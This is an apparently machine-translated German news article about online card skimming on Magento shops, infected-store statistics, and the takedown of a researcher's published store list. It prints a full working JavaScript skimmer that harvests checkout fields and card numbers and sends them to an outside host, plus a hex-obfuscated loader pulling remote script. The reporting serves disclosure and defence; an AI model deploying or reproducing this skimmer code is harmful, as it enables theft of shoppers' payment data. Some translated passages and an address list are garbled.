Online-Skimming ist eine relativ neue Form des Kreditkartenbetrugs. Die Essenz ergibt sich aus dem Namen. Wenn ein normaler Skimmer eine Überlagerung eines Geldautomatenkartenlesers ist, der einen Magnetstreifen entleert, ist ein Online-Skimmer ein Software-Lesezeichen auf einem Online-Shop-Server, das Zahlungsdaten passiv abfängt, wenn sie von einem Benutzer in Textfelder in einem Browser eingegeben werden. Bisher haben sich Carder hauptsächlich auf Transaktionsserver konzentriert, auf denen Verschlüsselung verwendet wird. In diesem Fall werden die Informationen jedoch bereits vor der Verschlüsselung entfernt. Dann werden Informationen über Zahlungskarten in geheimen Foren verkauft: Normalerweise kann ein Außenstehender mit diesen Karten bezahlen.Sicherheitsspezialisten bei Nightly Secure sagenDas Online-Skimming wird in letzter Zeit immer beliebter. Zum ersten Mal wurde die Verbreitung eines solchen Betrugs im Jahr 2015 erörtert . Ab November 2015 wurden aus der Liste der 255.000 Online-Shops 3.501 Stores mit JS-Lesezeichen auf dem Server gefunden. Im Laufe des Jahres stieg ihre Zahl um 69%.Ein Beispiel für ein Javascript-Lesezeichen zum Abfangen von Zahlungsdaten sieht folgendermaßen aus (in diesem Fall werden die Informationen an gesendet http://ownsafety.org/opp.php):<script>
function j(e) {
var t = "; " + document.cookie,
o = t.split("; " + e + "=");
return 2 == o.length ? o.pop().split(";").shift() : void 0
}
j("SESSIID") || (document.cookie = "SESSIID=" + (new Date).getTime()), jQuery(function(e) {
e("button").on("click", function() {
var t = "",
o = "post",
n = window.location;
if (new RegExp("onepage|checkout").test(n)) {
for (var c = document.querySelectorAll("input, select, textarea, checkbox"), i = 0; i < c.length; i++) if (c[i].value.length > 0) {
var a = c[i].name;
"" == a && (a = i), t += a + "=" + c[i].value + "&"
}
if (t) {
var l = new RegExp("[0-9]{13,16}"),
u = new XMLHttpRequest;
u.open(o, e("
<div />").html("http://ownsafety.org/opp.php").text(), !0), u.setRequestHeader("Content-type", "application/x-www-form-urlencoded"), u.send(t + "&asd=" + (l.test(t.replace(/s/g, "")) ? 1 : 0) + "&utmp=" + n + "&cookie=" + j("SESSIID")), console.clear()
}
}
})
});
Im vergangenen Jahr haben Forscher eine Liste häufig verwendeter Adressen für die Datenerfassung zusammengestellt:1860 https:
390 http:
309 https:
100 https:
70 https:
28 https:
23 https:
22 https:
20 https:
17 https:
10 https:
9 http:
5 https:
1 /js/index.php
1 /js/am/extensions/sitemap_api.php
1 https:
1 https:
1 https:
1 http:
1 http:
In fast allen Fällen werden kleine Versionen desselben Codes verwendet.Dieses Lesezeichen ist auf dem Server nur schwer zu erkennen. Der Code wird vom CMS heruntergeladen und funktioniert im Browser. Letztes Jahr arbeitete sie mehrere Monate an den genannten dreieinhalbtausend Standorten, an vielen - sechs Monaten oder länger.Experten glauben, dass eine große Anzahl infizierter Server einen hohen Automatisierungsgrad des Angriffs anzeigt. Nicht einige Script-Kiddies machen das, aber gute Profis. Wahrscheinlich aus Russland.Zur Implementierung von Lesezeichen werden Schwachstellen in der Software von Online-Shops verwendet. Erstens ist es eine anfällige Magento Commerce-Software. Dadurch ist es am einfachsten, den CMS-Code zu implementieren, obwohl dieser Code in jedem Online-Shop funktionieren kann, der nicht unbedingt Magento verwendet. Überprüfen Sie den Online-Shop auf Schwachstellen auf der Website MageReports.com .Obwohl das Problem vor einem Jahr angesprochen wurde, ist es im vergangenen Jahr nicht verschwunden. Schlimmer noch, infizierte Online-Shops sind eineinhalb Mal so groß geworden. Im März 2016 stieg die Anzahl der Geschäfte mit Skimmern von 3501 auf 4476 und im September 2016 auf 5925.Die Mitarbeiter von Nightly Secure haben eine Liste aller infizierten Geschäfte veröffentlicht, um Kunden zu warnen - und die Administratoren dieser Geschäfte über die Sicherheitsanfälligkeit zu informieren. Unter ihnen befanden sich sehr beliebte Standorte, darunter Abteilungen der Automobilhersteller (Audi ZA), Regierungsorganisationen (NRSC, Malaysia), Standorte populärer Musiker (Björk) und gemeinnützige Organisationen (Science Museum, Washington Cathedral).Wenn vor einem Jahr in fast allen Geschäften kleine Modifikationen desselben Online-Skimmers verwendet wurden, haben Forscher jetzt bereits 9 verschiedene Varianten des Skripts gefunden, die zu 3 verschiedenen Familien gehören ( Beispielcode auf Github ).Angreifer sind schlauer geworden und verwenden jetzt die mehrstufige Code-Verschleierung, die nicht so einfach zu analysieren ist. Ein Skript kann beispielsweise folgendermaßen maskiert werden:
Echter Malware-Code:<script language="javascript">window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x73\x63\x72'+'\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x69\x70\x2e\x35\x75\x75\x38\x2e\x63\x6f\x6d\x2f\x69\x70\x2f\x69\x70\x5f'+'\x34\x30\x37\x39\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72'+'\x69\x70\x74\x3e');
Die Autoren verbesserten auch den Mechanismus zum Abfangen von Zahlungskartendaten. Wenn die Malware früher einfach Seiten mit einer Zeichenfolge checkoutin der URL abgefangen hat , erkennt sie bereits die beliebten Zahlungs-Plug-Ins Firecheckout, Onestepcheckout und Paypal.Spezialisten von Nightly Secure versuchten, eine Reihe von Geschäften (etwa 30) zu kontaktieren und sie über den installierten Skimmer zu informieren, erhielten jedoch von den meisten Geschäften keine Antwort, während andere eine überraschende Lässigkeit zeigten. Einer sagte, dies sei nicht sein Problem, da Zahlungen von einem Drittunternehmen abgewickelt würden. Der zweite sagte, es sei nur ein Javascript-Fehler, der keine Bedrohung darstelle. Der dritte sagte, dass es keine Gefahr geben kann, weil "der Laden mit HTTPS arbeitet". Der Autor hat Google eine Liste der Skimmer-Stores zur schwarzen Liste von Chrome Safe Browsing übermittelt.Eine Liste aller Skimmer-Läden wurde ursprünglich auf Github veröffentlicht . Und hier begann der Spaß. Bald Github ohne Vorwarnungdie Veröffentlichung von Forschungsergebnissen aus Online-Shops von seiner Website entfernt .Anscheinend zensierte Github nach dem Standardverfahren, nachdem er eine DMCA-Anfrage von einem der Geschäfte erhalten hatte. Natürlich ist der Laden unangenehm, wenn sie Verwundbarkeit finden und es der ganzen Welt erzählen.Gestern hat der Autor die Ergebnisse einer Online-Shop-Sicherheitsstudie auf Gitlab-Hosting übertragen . Heute gibt eine Seite unter dieser Adresse den Fehler 404 zurück. Vor einigen Stunden erhielt der Autor eine E-Mail von Gitlab, in der die Gründe für das Entfernen erläutert wurden. Nach Angaben der Verwaltung wird die Veröffentlichung einer Liste gefährdeter Geschäfte als „ungeheuerlicher Fall“ angesehen, der nicht gelöst werden kann. Daher wurde die Liste gelöscht (UPD: Zugriff wiederhergestelltGitlab-Direktor entschuldigte sich).Kopie der Liste im WebarchivNach Pastebin kopierenBeachten Sie, dass in der Liste der Geschäfte mit installierten Online-Skimmern 44 Domänen in der .RU-Zone aufgeführt sind.Hoffentlich werden die Administratoren dieser Geschäfte die Magento-Version umgehend mit den neuesten Patches installieren und Verluste für Kunden ausgleichen, bei denen Kopien von Zahlungskarten auf den Schwarzmarkt gelangt sind.